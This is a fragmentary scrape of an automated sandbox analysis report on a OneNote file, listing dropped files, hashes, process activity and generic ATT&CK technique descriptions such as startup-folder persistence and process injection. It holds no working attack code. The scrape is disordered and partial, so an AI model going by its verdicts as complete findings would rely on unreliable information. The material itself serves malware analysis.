SHA-256:	B1337531205B8CC04542C77C176A8680DA170ABC351CE4960D66C42A70C6727F
SHA-512:	C1B5A5BE6AD992DB511130B8F91378D95987B9EEE443C4AAA2BE562B1C458B0A301FB9027D037D052804A4D493853A27FB75C5B750101D3F907CF86AFA013720
Malicious:	false
Preview:	...................................FL..................F.@.. ....D.F.S..H$lj.;...D.F.S..@......................./....P.O. .:i.....+00.../C:\.....................1......R.y..PROGRA~1..t......sN.&GV\.....B...............J.......b.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....j.1......R....MICROS~2..R......R..GVa...........................@E$.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....N.1......R....root..:......R..GV\..............................r.o.o.t.....Z.1......R....Office16..B......R..GV\.....t......................c?.O.f.f.i.c.e.1.6.....b.2.@....R\|. .ONENOTE.EXE.H......R\|.GVg.....'......................a^.O.N.E.N.O.T.E...E.X.E.......j...............-.......i...........;S.......C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.;.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.R.o.o.t.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Root\Office16

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IUZVMT80T5WC25POJT8C.temp

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Matlab v4 mat-file (little endian) \253\373\277\272, sparse, rows 1, columns 0, imaginary
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.163890986728065
Encrypted:	false
SSDEEP:	3:/lklT8OFf:CT8Ol
MD5:	4FCB2A3EE025E4A10D21E1B154873FE2
SHA1:	57658E2FA594B7D0B99D02E041D0F3418E58856B
SHA-256:	90BF6BAA6F968A285F88620FBF91E1F5AA3E66E2BAD50FD16F37913280AD8228
SHA-512:	4E85D48DB8C0EE5C4DD4149AB01D33E4224456C3F3E3B0101544A5CA87A0D74B3CCD8C0509650008E2ABED65EFD1E140B1E65AE5215AB32DE6F6A49C9D3EC3FF
Malicious:	false
Preview:	........................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KF4QKES67T2OG3H6KPH2.temp

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	3999
Entropy (8bit):	3.5364250825445263
Encrypted:	false
SSDEEP:	48:Ih2jd7fk67OIdN5DMJC5ydfdHd7fk6UuzckydNZGcG7CZYgn:IYfcaMjdfnfT59jDE
MD5:	B8B870A22FCB2C059E93656596A0719F
SHA1:	B08CED048147DEB6B0EB724D1FED7BFAA391618B
SHA-256:	B1337531205B8CC04542C77C176A8680DA170ABC351CE4960D66C42A70C6727F
SHA-512:	C1B5A5BE6AD992DB511130B8F91378D95987B9EEE443C4AAA2BE562B1C458B0A301FB9027D037D052804A4D493853A27FB75C5B750101D3F907CF86AFA013720
Malicious:	false
Preview:	...................................FL..................F.@.. ....D.F.S..H$lj.;...D.F.S..@......................./....P.O. .:i.....+00.../C:\.....................1......R.y..PROGRA~1..t......sN.&GV\.....B...............J.......b.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....j.1......R....MICROS~2..R......R..GVa...........................@E$.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....N.1......R....root..:......R..GV\..............................r.o.o.t.....Z.1......R....Office16..B......R..GV\.....t......................c?.O.f.f.i.c.e.1.6.....b.2.@....R\|. .ONENOTE.EXE.H......R\|.GVg.....'......................a^.O.N.E.N.O.T.E...E.X.E.......j...............-.......i...........;S.......C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.;.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.R.o.o.t.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Root\Office16

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, Sparse, ctime=Thu May 27 16:03:55 2021, mtime=Tue Feb 7 16:27:40 2023, atime=Thu May 27 16:03:55 2021, length=179528, window=hide
Category:	dropped
Size (bytes):	1310
Entropy (8bit):	4.65136984595369
Encrypted:	false
SSDEEP:	24:8eF1Gd7KWkrhKnxU1Q8Ag+cFUKdNZhxoJPznWTabwMb1m2:8eKd7fk6U1UzcF5dNZJa0M5
MD5:	3EF0A4E2901C1D9678DF7291E6E05E47
SHA1:	2B7BCBD1FEEBFF53E4F5B5141CA6A74F538BEB76
SHA-256:	BAFA36F78E0D850E79C2F0E6EA41C9FA060590F50880C11E819769E43D872E20
SHA-512:	4A545BB674C37A74D69E4FB16DF41816EA61FEB9F4406ED2582CAFB1D0409ACC1C8B8F6DDBCF5BFDD35246AAE96565D0FBDE0591D3DD779AD2C872CEB977F847
Malicious:	false
Preview:	L..................F.... ....D.F.S....z.;...D.F.S..H.......................3....P.O. .:i.....+00.../C:\.....................1......R.y..PROGRA~1..t......sN.&GV\.....B...............J.......b.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....j.1......R....MICROS~2..R......R..GVa...........................@E$.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....N.1......R....root..:......R..GV\..............................r.o.o.t.....Z.1......R....Office16..B......R..GV\.....t......................c?.O.f.f.i.c.e.1.6.....f.2.H....R\|. .ONENOTEM.EXE..J......R\|.GVu.....(......................a^.O.N.E.N.O.T.E.M...E.X.E.......k...............-.......j...........;S.......C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE....S.e.n.d. .t.o. .O.n.e.N.o.t.e.T.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E.M...E.X.E.../.t.s.r.........&................c^...NI..e.2...

C:\Users\user\Desktop\Notes.one

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	159160
Entropy (8bit):	5.94288160988971
Encrypted:	false
SSDEEP:	1536:cevY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7B2x0R6Z+x:LgS2EJbyYeMYkKkyX3DWvLLATidRg+4Q
MD5:	CD0295862C451E2D78095C9ED9ECB682
SHA1:	77644CC59D36DAFAB95AD581A287156E64EFCEDD
SHA-256:	55973E556A0421FD4BC03F1B28C13A9603C626279AD27A7BDAC98312A35BC195
SHA-512:	58B231B1E4B58EE679F1FE45C7C855A953228B7939306C2838A55AB13A6F514C6223B6E76B78EA45D79FAC2704F8EC27128B30C4E95BF9C822A94193F109D14A
Malicious:	false
Preview:	.R\{..M..Sx.)..5._..O....7...................?.....I.......................................................................................@...................h...............8f......0....m.............c?..a.{E.q.i.K..G........R..@..N.&..5.................................??.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6184
Entropy (8bit):	1.2335831237022787
Encrypted:	false
SSDEEP:	12:RaaYyfi/U/QNofQQsl+Wn+J/2KD967OXIxAS0H1DcZyV7y9NLqrIB:YaYyf14sQQvfAAbCAS0VQZyVGvJ
MD5:	0D20399094975B50803AFBF99CF868AF
SHA1:	D6FBD32AD1323673C824B608ADB9022E7445BA17
SHA-256:	5B4CA6D90C5960D9D765FB12D591C76348806D75D684F7949D2260F8E82B7C1A
SHA-512:	79EC126C37277D6D8BD1219D1051C0C1DE666B873E5D3B1881CD82561574B0F54E4273F73C3F854F0ACD65B4700153D13273CAB1F0A626DC07759D54BAEAAFD6
Malicious:	false
Preview:	./.C..vL....W"v_$m.z.\.O....#..N................?.....I...............................................................................................................h...........................(................3....1O.!4..i.^............^L.4... Di.............................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\OneNote Notebooks\My Notebook\Quick Notes.one

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5272
Entropy (8bit):	1.328377905691142
Encrypted:	false
SSDEEP:	12:HaYyfnjEUPlHQQkj8j6VstO/rjoDjmbaC8jJlgf9pE5vZj38sHogC:HaYyfnzdHQQ8stT/AbE5vZjKH
MD5:	5E7994FF5C9C380D8F292F3324D151CD
SHA1:	8F4CE8A43AD9DF2B2484B9338CAA12DDB64280DF
SHA-256:	D23253ADC8B345D11679E9C6DC91AE6126A93EBBEE1A7EB1A41CE264110E7979
SHA-512:	A29DFED465E566E5EB9490F004CEE5C1386C534A72473DA2D1E94CCD712B6FFC948E57138617C05E1A7A2513190449CA43EC92B85B74C6EB74A916CC359B7299
Malicious:	false
Preview:	.R\{..M..Sx.)...."`.`.K......f,................?.....I...................................................................$m.z.\.O....#..N0.......................h..................................................K...".>..........%.m..I......&.............................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	data
Entropy (8bit):	5.753088065383819
TrID:	Microsoft OneNote note (16024/2) 100.00%
File name:	Notes.one
File size:	159160
MD5:	11066dd27f54df0d6946c2cce1e92c54
SHA1:	ea61d3122e2c9fc7ebd70f7adb70d1354c01373a
SHA256:	3121e24a33897d265264476556555ad9cda4f81fb988e6f87545053a1f7b2a18
SHA512:	392f9a1a48aa8589db5188361cbac93ec9380bb7ffb6488921cf8c681abc6a5bba2b52cbbe825629df34cc749d04605bfdf9e8977f1f4bca36d7b72fcbe1b8d6
SSDEEP:	1536:YevY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7P2x0R6ZoQ:PgS2EJbyYeMYkKkyX3DWvLLATijRgoQ
TLSH:	96F3D026F181865ACB2A417909E76F747373BE029591271FDFB62E2C5DF0288CC9468F
File Content Preview:	.R\{...M..Sx.)..5._....O....7...................?......I........................................................................................@...................h...............8f......0....m...............n.....I..&.....7........R..@..N.&..5......

File Icon


Icon Hash:	d4dce0626664606c

Network Behavior

Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: ONENOTE.EXEPID: 6232, Parent PID: 3840

General

Target ID:	7
Start time:	18:27:12
Start date:	07/02/2023
Path:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Notes.one
Imagebase:	0x7ff63b610000
File size:	428352 bytes
MD5 hash:	40B3448599978A2E151089DB8E6527C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: ONENOTEM.EXEPID: 6652, Parent PID: 6232

General

Target ID:	10
Start time:	18:27:40
Start date:	07/02/2023
Path:	C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE
Wow64 process (32bit):	false
Commandline:	/tsr
Imagebase:	0x7ff637020000
File size:	179528 bytes
MD5 hash:	A9E0C0B66CC33223550D66E7A0B15FC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Notes.one

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Software Vulnerabilities

System Summary

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\onenote.exe_Rules.xml

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-journal

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-shm

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-wal

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\header

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000007.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000008.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000009.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000A.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000C.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000G.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000I.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000K.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000M.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000O.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001T.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001V.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000021.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000023.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000025.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000027.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000029.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002C.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002E.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002G.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002I.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002J.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002L.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002M.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002O.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002Q.bin

Windows Analysis Report
Notes.one